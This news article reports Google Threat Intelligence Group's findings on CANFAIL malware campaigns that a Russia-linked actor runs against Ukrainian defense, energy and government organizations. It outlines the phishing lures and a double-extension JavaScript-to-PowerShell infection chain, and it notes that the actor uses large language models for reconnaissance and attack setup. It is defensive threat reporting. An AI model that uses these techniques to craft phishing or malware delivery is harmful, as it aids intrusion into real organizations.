Google Threat Intelligence Group has attributed a series of cyber attacks targeting Ukrainian organizations to a previously undocumented threat actor believed to be affiliated with Russian intelligence services. The campaigns involve the deployment of a malware strain known as CANFAIL and have primarily focused on defense, military, government, and energy entities operating at both regional and national levels within Ukraine. The findings highlight continued cyber activity aligned with the broader geopolitical conflict, with attackers adapting their techniques to expand operational reach and effectiveness.
According to Google Threat Intelligence Group, the actor has recently broadened its targeting scope beyond traditional government and defense institutions. Investigations indicate growing interest in aerospace organizations, manufacturing firms with military and drone related ties, nuclear and chemical research institutions, and international bodies engaged in conflict monitoring and humanitarian assistance efforts within Ukraine. While the group is assessed to be less sophisticated and comparatively fewer resourced than other known Russian aligned threat actors, researchers observed that it has started leveraging large language models to overcome certain technical limitations. Through structured prompting, the group reportedly conducts reconnaissance, develops tailored social engineering lures, and seeks guidance on technical aspects of post compromise activities and command and control infrastructure setup.
Recent phishing campaigns attributed to the actor demonstrate calculated impersonation tactics. In several instances, the group posed as legitimate national and local Ukrainian energy organizations in an effort to gain unauthorized access to corporate and personal email accounts. The activity also extended beyond Ukraine’s borders, with attackers masquerading as a Romanian energy company serving Ukrainian customers. Researchers further observed targeting of a Romanian firm and reconnaissance operations directed at Moldovan organizations, suggesting a regional intelligence gathering component to the campaign. To facilitate these operations, the threat actor generates customized email address lists aligned with specific industries and geographic regions, enabling more focused spear phishing efforts.
The infection chain frequently involves emails embedding Google Drive links that host a RAR archive containing the CANFAIL malware. The malicious payload is typically disguised using a double file extension such as pdf.js to appear as a legitimate document. Once executed, CANFAIL functions as obfuscated JavaScript designed to trigger a PowerShell script that downloads and runs a memory resident PowerShell dropper. Simultaneously, the malware displays a fabricated error message to reduce suspicion and maintain persistence. Google also linked the actor to a previously reported campaign known as PhantomCaptcha, disclosed by SentinelOne SentinelLABS in October 2025. That operation targeted organizations associated with Ukraine’s war relief initiatives through phishing emails that redirected victims to fraudulent web pages featuring ClickFix style instructions. The process ultimately delivered a WebSocket based trojan to compromised systems.
The analysis underscores the evolving tactics of state aligned cyber actors and the increasing use of artificial intelligence tools to refine reconnaissance and social engineering capabilities. As the conflict in Ukraine continues to influence cyber activity across Europe, organizations involved in defense, energy, humanitarian support, and related sectors remain exposed to sustained phishing and malware driven intrusion attempts.
Follow the SPIN IDG WhatsApp Channel for updates across the Smart Pakistan Insights Network covering all of Pakistan’s technology ecosystem.
